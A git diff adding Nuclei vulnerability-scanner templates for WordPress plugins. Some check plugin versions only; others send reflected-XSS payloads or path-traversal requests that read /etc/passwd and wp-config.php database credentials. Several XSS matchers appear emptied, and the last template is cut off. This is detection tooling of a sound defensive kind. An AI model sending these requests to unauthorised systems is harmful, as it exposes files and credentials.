./poc/search/cardoza-ajax-search.yaml +./poc/search/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/search/cm-on-demand-search-and-replace-b9ef4c42066d1243c4361875af401867.yaml ./poc/search/cm-on-demand-search-and-replace-c88511895f4973dac1281187970c5197.yaml ./poc/search/cm-on-demand-search-and-replace-c930e28cc682e30a9cd848d840bf5599.yaml @@ -120627,6 +120720,7 @@ ./poc/social/twitter-plugin-73b27079a4e2a001195d157dd0684416.yaml ./poc/social/twitter-plugin-e1d9dfdea2bd6c473515cb426182f4d6.yaml ./poc/social/twitter-plugin.yaml +./poc/social/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml ./poc/social/twitter-real-time-search-scrolling-80d16706c4e400906f78635a43d8bce4.yaml ./poc/social/twitter-real-time-search-scrolling.yaml ./poc/social/twitter-secret(1).yaml @@ -122144,6 +122238,7 @@ ./poc/sql/CVE-2023-7199-771da08db31196eec3c07a2d74a68d47.yaml ./poc/sql/CVE-2023-7204-d9a87e6f99d8ec51bcdbc22893c28d0e.yaml ./poc/sql/CVE-2023-7287-6bfa7db55abe86e184a7874b8579256d.yaml +./poc/sql/CVE-2023-7297-a95d63f970ebd421a8709918222db375.yaml ./poc/sql/CVE-2024-0236-8b9db5f11cac4a929f23be7822edd92a.yaml ./poc/sql/CVE-2024-0249-33d2477db1d599b9d98c92d0bbc3fb77.yaml ./poc/sql/CVE-2024-0324-2d8d93ffa67c92b2f1ddbe0ca4721845.yaml @@ -122179,6 +122274,7 @@ ./poc/sql/CVE-2024-1049-0e66fa189b7475aa8bef5ee2db21f9f7.yaml ./poc/sql/CVE-2024-10515-5613c1285c13db3e8e7567a1d6eaba45.yaml ./poc/sql/CVE-2024-10528-eac229beaabedbff0577ee78d6ac55d8.yaml +./poc/sql/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml ./poc/sql/CVE-2024-10592-5953010a8969c666bdb90006ddda2bb4.yaml ./poc/sql/CVE-2024-10627-1c85a579db4c49a8c9cbe80724b7af26.yaml ./poc/sql/CVE-2024-10647-f9db24370dab16c6bbf61c415c445725.yaml @@ -122199,8 +122295,12 @@ ./poc/sql/CVE-2024-1095-741eaa5507c75edbe90bc3ba4e40e5a9.yaml ./poc/sql/CVE-2024-10961-c22c374f4ffe67db892c953e4cf45c93.yaml ./poc/sql/CVE-2024-11088-564fc5eaafcf306cc1db90950bcd86ec.yaml +./poc/sql/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml ./poc/sql/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml ./poc/sql/CVE-2024-11197-b1a29e2fb93e8f055bb485dbbb4122a8.yaml +./poc/sql/CVE-2024-11202-7e66c6243adb4eea85c26f32e6f8ebab.yaml +./poc/sql/CVE-2024-11202-fff8c296c72f5db38be0e5405c2da320.yaml +./poc/sql/CVE-2024-11225-d04b85edb3b4b1503b77188d5240c512.yaml ./poc/sql/CVE-2024-11265-034e9ebd3db460e0c25197fe05cce744.yaml ./poc/sql/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml ./poc/sql/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml @@ -122278,6 +122378,7 @@ ./poc/sql/CVE-2024-2186-ddbd98614861cf0f218b059975bb059b.yaml ./poc/sql/CVE-2024-2187-bdbc8a78ef60910e9f7dca097517ab85.yaml ./poc/sql/CVE-2024-22135-aa0536d89ba0db70524ad0dec0d6fe8c.yaml +./poc/sql/CVE-2024-22137-9ccea012e0ac1d68360d1db53ebe0f41.yaml ./poc/sql/CVE-2024-22290-1189eefcf4ba1dbce161712b5603b645.yaml ./poc/sql/CVE-2024-22291-dcaac6cfae9f01312fefeb3df3e7db02.yaml ./poc/sql/CVE-2024-22294-897d97db9d7d6e87202336de8d087613.yaml @@ -122707,6 +122808,7 @@ ./poc/sql/CVE-2024-47630-88ac2fee16dbb7484715f57a922d6331.yaml ./poc/sql/CVE-2024-47633-3e9ee9fedbde18139742b8f2882ae9d4.yaml ./poc/sql/CVE-2024-47635-fdb3493fb4811f6df08d86524a5576cb.yaml +./poc/sql/CVE-2024-47639-19456cd5cae51d9dbada09d8ad8ba38f.yaml ./poc/sql/CVE-2024-47645-107ee6912b6dbf8ebc560bd5f696aa95.yaml ./poc/sql/CVE-2024-4779-2538af254bdbffcd0c4f76bfdaf81c5f.yaml ./poc/sql/CVE-2024-4789-db4647af61ca31063be76c6f44a638fb.yaml @@ -122952,6 +123054,7 @@ ./poc/sql/CVE-2024-9225-8aa496476e08c8c664db47cbf34e8cf4.yaml ./poc/sql/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml ./poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml +./poc/sql/CVE-2024-9307-99143edb3a824cd072b593997866abef.yaml ./poc/sql/CVE-2024-9357-c4db257cbb3582805d4e4a79e0374022.yaml ./poc/sql/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml ./poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml @@ -123723,6 +123826,7 @@ ./poc/sql/blogintroduction-wordpress-plugin-a64dfdb35a4384acb2d4d68e05f08394.yaml ./poc/sql/blogroll-fun-ac035dad8502e6d379e7796cdb889e8e.yaml ./poc/sql/blogstand-smart-banner-87540e38c0ec2adb47041929da1ff74d.yaml +./poc/sql/bne-gallery-extended-3622d51c6b74dbf4cdd79a233382f3ca.yaml ./poc/sql/bo-wc-customer-review-watson-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/boilerplate-extension-82295f02171db479d37da90a7d662e98.yaml ./poc/sql/bold-page-builder-2db59b40ea3793f152fa65740f2203eb.yaml @@ -123958,6 +124062,7 @@ ./poc/sql/classified-listing-203ed011f4b9c3d58db1a5549c1d1d12.yaml ./poc/sql/classified-listing-4f13524aa9e30ac6373e0dbd9053098b.yaml ./poc/sql/clean-social-icons-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/cleantalk-spam-protect-372c8c9f4c2858edb68c8f1d9d6fa18e.yaml ./poc/sql/cleantalk-spam-protect-cdb8feeb356db8592e2e77f8bb1b6433.yaml ./poc/sql/click-to-top-78a86132517e0271db60a3979bd52f00.yaml ./poc/sql/clickbank-ads-clickbank-widget-39dc1dd9bed8d1dbef6e775199cd3fbb.yaml @@ -123977,9 +124082,15 @@ ./poc/sql/clover-online-orders-7cf3a21b435e40c9843db22b9b1e37b4.yaml ./poc/sql/cm-ad-changer-a7c53137049fcd26587cfb7bf3bdbc75.yaml ./poc/sql/cm-ad-changer-ad19a5f7e8dbb73d195b2498a24fc6e8.yaml +./poc/sql/cm-business-directory-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/sql/cm-download-manager-3c8dbfa632b4dbfffb3c8c56d5135ce1.yaml ./poc/sql/cm-download-manager-a0341bf64b0c8b6fa11db4648bc1942e.yaml +./poc/sql/cm-email-blacklist-341142a6bceeaabdbeb709723a8564c9.yaml +./poc/sql/cm-header-footer-script-loader-341142a6bceeaabdbeb709723a8564c9.yaml +./poc/sql/cm-on-demand-search-and-replace-341142a6bceeaabdbeb709723a8564c9.yaml +./poc/sql/cm-pop-up-banners-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/sql/cm-pop-up-banners-c6881fe258c1fa0dd33dbf550460f630.yaml +./poc/sql/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/sql/cms-commander-client-76b931b6fcc8dbcb6e16d1e54df1775e.yaml ./poc/sql/cms-press-b0e8a69291b11db48d1fc51eb83e2fbf.yaml ./poc/sql/cmseasy-aid-sqli.yaml @@ -124656,6 +124767,7 @@ ./poc/sql/emergency-password-reset-ac5cb6bd414bb0dbceb828355bc820a8.yaml ./poc/sql/ems-sqli.yaml ./poc/sql/english-wp-admin-1be71793df056db5cf0828f5f271bdd1.yaml +./poc/sql/enhanced-tooltipglossary-341142a6bceeaabdbeb709723a8564c9.yaml ./poc/sql/enhanced-tooltipglossary-cec6dde40228540cdbf61d3d987375ed.yaml ./poc/sql/enhanced-wordpress-contactform-f32b447e5b5bf42e6f6db5f314e311a2.yaml ./poc/sql/enigma-chartjs-eddbc3a06b66071ffc106682eef00a39.yaml @@ -124682,6 +124794,7 @@ ./poc/sql/error-based-sqli-post-request.yaml ./poc/sql/error-based-sqli.yaml ./poc/sql/error-log-monitor-6477bf18cad6c823db485408d49b337b.yaml +./poc/sql/error-sqli.yaml ./poc/sql/errorbased_sqli.yaml ./poc/sql/errsqli.yaml ./poc/sql/esafenet-mysql-fileread.yaml @@ -125898,6 +126011,8 @@ ./poc/sql/nocodb-panel.yaml ./poc/sql/nocodb.yaml ./poc/sql/nofollow-all-external-links-1252194ad26b032bf0693dbd1a1c47e7.yaml +./poc/sql/nokaut-offers-box-0f3bd1dbea65ea23a33e64d82488e169.yaml +./poc/sql/nokaut-offers-box-d698070b224b4726dbc297056bea4cbe.yaml ./poc/sql/nokke-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/note-press-865f978211c1ec7412e27b5b8edb2da7.yaml ./poc/sql/notificationx-sqli.yaml @@ -127167,6 +127282,7 @@ ./poc/sql/twentyfourth-wp-scraper-6477bf18cad6c823db485408d49b337b.yaml ./poc/sql/twigify-b7de650c05254b194a03adb0bbb4b850.yaml ./poc/sql/twitter-bootstrap-slider-05618a8581e0f080dedba3ca942cc17a.yaml +./poc/sql/twitter-posts-8f2dbde369351cc27693796adbcd9a58.yaml ./poc/sql/twl-easy-call-44c77796893ecfe964db9f129906e241.yaml ./poc/sql/typofr-50c7a8d6d6928e0edbdd25d945accee8.yaml ./poc/sql/ubermenu-f5905ac46fc848b6b7db6aec714caee2.yaml @@ -128835,6 +128951,7 @@ ./poc/sql_injection/error-based-sqli-get-request.yaml ./poc/sql_injection/error-based-sqli-post-request.yaml ./poc/sql_injection/error-based-sqli.yaml +./poc/sql_injection/error-sqli.yaml ./poc/sql_injection/errorbased_sqli.yaml ./poc/sql_injection/errsqli.yaml ./poc/sql_injection/esafenet-mysql-fileread.yaml @@ -131321,6 +131438,7 @@ ./poc/web/geovision-geowebserver-xss.yaml ./poc/web/geowebcache.yaml ./poc/web/geowebserver-detector.yaml +./poc/web/geowebserver-lfi-xss.yaml ./poc/web/geowebserver-workflow.yaml ./poc/web/git-web-interface-7713.yaml ./poc/web/git-web-interface.yaml @@ -133909,6 +134027,7 @@ ./poc/wordpress/spawp-theme.yaml ./poc/wordpress/spawp.yaml ./poc/wordpress/spotify-play-button-for-wordpress-4b4b001e99a774355b7bd5a059e1bfc4.yaml +./poc/wordpress/spotify-play-button-for-wordpress-6157ddc840ff3aaacb724f29e67883ff.yaml ./poc/wordpress/spotify-play-button-for-wordpress-8f895bd6afa69660832ab82d39eca53c.yaml ./poc/wordpress/spotify-play-button-for-wordpress-9def66e1fb324a1ac273bd1f22fe1128.yaml ./poc/wordpress/spotify-play-button-for-wordpress.yaml @@ -134705,6 +134824,7 @@ ./poc/wordpress/wordpress-popup-773fdf3928e22c6a993835af54bb5ecc.yaml ./poc/wordpress/wordpress-popup-8a2326cec4cb67e442bb467f62462452.yaml ./poc/wordpress/wordpress-popup-af7b7ffaf25f8475183bbd05b2992e9c.yaml +./poc/wordpress/wordpress-popup-be069733ca362578f99c68a45b934c7d.yaml ./poc/wordpress/wordpress-popup-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wordpress-popup-d693a473f4f76eff68ed441bb8f866eb.yaml ./poc/wordpress/wordpress-popup-e6219a1478106c90fd693153d9df8d16.yaml @@ -137676,6 +137796,7 @@ ./poc/wordpress/wp-pagseguro-payments.yaml ./poc/wordpress/wp-parsidate-02752217058d19321ce6136f605f443e.yaml ./poc/wordpress/wp-parsidate-646b2fb38564e3d6ed9c0ed316a5141e.yaml +./poc/wordpress/wp-parsidate-7b898c57c30032aff3f3e6faaf604680.yaml ./poc/wordpress/wp-parsidate-cd5461c298331e6088879d243a935f4e.yaml ./poc/wordpress/wp-parsidate-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/wordpress/wp-parsidate-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -140671,6 +140792,7 @@ ./poc/xss/geovision-geowebserver-xss-7600.yaml ./poc/xss/geovision-geowebserver-xss-7601.yaml ./poc/xss/geovision-geowebserver-xss.yaml +./poc/xss/geowebserver-lfi-xss.yaml ./poc/xss/global-domains-xss-7717.yaml ./poc/xss/global-domains-xss-7718.yaml ./poc/xss/global-domains-xss.yaml diff --git a/poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml b/poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml new file mode 100644 index 0000000000..8d76e8c6c3 --- /dev/null +++ b/poc/auth/cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9.yaml @@ -0,0 +1,59 @@ +id: cm-video-lesson-manager-341142a6bceeaabdbeb709723a8564c9 + +info: + name: > + Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/cm-video-lesson-manager/" + google-query: inurl:"/wp-content/plugins/cm-video-lesson-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,cm-video-lesson-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-video-lesson-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-video-lesson-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.2') \ No newline at end of file diff --git a/poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml b/poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml new file mode 100644 index 0000000000..8860ed5eba --- /dev/null +++ b/poc/backup/boldgrid-backup-889122f13f92f4a43160426c13aa8df0.yaml @@ -0,0 +1,59 @@ +id: boldgrid-backup-889122f13f92f4a43160426c13aa8df0 + +info: + name: > + Total Upkeep <= 1.16.6 - Authenticated (Administrator+) Remote Code Execution via Backup Settings + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/804b42a0-1cea-4f68-bd4a-d292a9f23fbe?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/boldgrid-backup/" + google-query: inurl:"/wp-content/plugins/boldgrid-backup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,boldgrid-backup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "boldgrid-backup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.16.6') \ No newline at end of file diff --git a/poc/cve/CVE-2011-1669-2046.yaml b/poc/cve/CVE-2011-1669-2046.yaml new file mode 100644 index 0000000000..ab577ddc1d --- /dev/null +++ b/poc/cve/CVE-2011-1669-2046.yaml @@ -0,0 +1,31 @@ +id: CVE-2011-1669 +info: + name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: A directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 + - https://www.exploit-db.com/exploits/17119 + - http://web.archive.org/web/20210121212348/https://www.securityfocus.com/bid/47146/ + - http://www.exploit-db.com/exploits/17119 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2011-1669 + metadata: + google-query: inurl:"/wp-content/plugins/wp-custom-pages/" + tags: cve,cve2011,wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/18 diff --git a/poc/cve/CVE-2011-4624-2075.yaml b/poc/cve/CVE-2011-4624-2075.yaml new file mode 100644 index 0000000000..5ad804b793 --- /dev/null +++ b/poc/cve/CVE-2011-4624-2075.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-4624 + +info: + name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/cve/CVE-2013-3526-2254.yaml b/poc/cve/CVE-2013-3526-2254.yaml new file mode 100644 index 0000000000..a65162e1be --- /dev/null +++ b/poc/cve/CVE-2013-3526-2254.yaml @@ -0,0 +1,30 @@ +id: CVE-2013-3526 + +info: + name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526 + tags: cve,cve2013,wordpress,xss,wp-plugin + description: "Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2013-4625-2269.yaml b/poc/cve/CVE-2013-4625-2269.yaml new file mode 100644 index 0000000000..18e8ab1369 --- /dev/null +++ b/poc/cve/CVE-2013-4625-2269.yaml @@ -0,0 +1,30 @@ +id: CVE-2013-4625 + +info: + name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 + + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2014-4535-2349.yaml b/poc/cve/CVE-2014-4535-2349.yaml new file mode 100644 index 0000000000..5d3164e594 --- /dev/null +++ b/poc/cve/CVE-2014-4535-2349.yaml @@ -0,0 +1,32 @@ +id: CVE-2014-4535 +info: + name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd + - https://nvd.nist.gov/vuln/detail/CVE-2014-4535 + tags: cve,cve2014,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2014-4535 + cwe-id: CWE-79 + description: "Cross-site scripting (XSS) vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php." +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/import–legacy–media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "'>" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2014-4592-2380.yaml b/poc/cve/CVE-2014-4592-2380.yaml new file mode 100644 index 0000000000..8644ea6f44 --- /dev/null +++ b/poc/cve/CVE-2014-4592-2380.yaml @@ -0,0 +1,37 @@ +id: CVE-2014-4592 +info: + name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter. + reference: + - https://wpscan.com/vulnerability/3c9a3a97-8157-4976-8148-587d923e1fb3 + - https://nvd.nist.gov/vuln/detail/CVE-2014-4592 + - http://codevigilant.com/disclosure/wp-plugin-wp-planet-a3-cross-site-scripting-xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-4592 + cwe-id: CWE-79 + metadata: + google-query: inurl:"/wp-content/plugins/wp-planet" + tags: cve,cve2014,wordpress,wp-plugin,xss +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2014-5368-2398.yaml b/poc/cve/CVE-2014-5368-2398.yaml new file mode 100644 index 0000000000..c629fa4d25 --- /dev/null +++ b/poc/cve/CVE-2014-5368-2398.yaml @@ -0,0 +1,30 @@ +id: CVE-2014-5368 +info: + name: WordPress Plugin WP Content Source Control - Directory Traversal + author: daffainfo + severity: high + description: A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-5368 + - https://www.exploit-db.com/exploits/39287 + - https://www.cvedetails.com/cve/CVE-2014-5368 + tags: cve,cve2014,wordpress,wp-plugin,lfi + classification: + cve-id: CVE-2014-5368 +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php" + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/CVE-2014-9094-2416.yaml b/poc/cve/CVE-2014-9094-2416.yaml new file mode 100644 index 0000000000..81ae8ce817 --- /dev/null +++ b/poc/cve/CVE-2014-9094-2416.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2015-9480-2629.yaml b/poc/cve/CVE-2015-9480-2629.yaml new file mode 100644 index 0000000000..ac300031f7 --- /dev/null +++ b/poc/cve/CVE-2015-9480-2629.yaml @@ -0,0 +1,33 @@ +id: CVE-2015-9480 + +info: + name: WordPress RobotCPA 5 - Directory Traversal + author: daffainfo + severity: high + description: The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter. + reference: + - https://www.exploit-db.com/exploits/37252 + - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-9480 + cwe-id: CWE-22 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/20 diff --git a/poc/cve/CVE-2016-1000130-2660.yaml b/poc/cve/CVE-2016-1000130-2660.yaml new file mode 100644 index 0000000000..811e6a7a96 --- /dev/null +++ b/poc/cve/CVE-2016-1000130-2660.yaml @@ -0,0 +1,35 @@ +id: CVE-2016-1000130 +info: + name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via date_select.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin e-search v1.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000130 + - https://wordpress.org/plugins/e-search + - http://www.vapidlabs.com/wp/wp_advisory.php?v=394 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000130 + cwe-id: CWE-79 + metadata: + google-query: inurl:"/wp-content/plugins/e-search" + tags: cve,cve2016,wordpress,xss,wp-plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2016-1000136-2686.yaml b/poc/cve/CVE-2016-1000136-2686.yaml new file mode 100644 index 0000000000..f6b6733834 --- /dev/null +++ b/poc/cve/CVE-2016-1000136-2686.yaml @@ -0,0 +1,38 @@ +id: CVE-2016-1000136 + +info: + name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin heat-trackr v1.0 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 + - https://wordpress.org/plugins/heat-trackr + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000136 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2017-1000170-2838.yaml b/poc/cve/CVE-2017-1000170-2838.yaml new file mode 100644 index 0000000000..234f130531 --- /dev/null +++ b/poc/cve/CVE-2017-1000170-2838.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-1000170 +info: + name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion + author: dwisiswant0 + severity: high + description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree. + reference: + - https://www.exploit-db.com/exploits/49693 + - https://github.com/jqueryfiletree/jqueryfiletree/issues/66 + - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2017-1000170 + cwe-id: CWE-22 + tags: cve,cve2017,wordpress,wp-plugin,lfi,jquery +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php" + body: "dir=%2Fetc%2F&onlyFiles=true" + matchers-condition: and + matchers: + - type: word + words: + - "
  • " + - "passwd
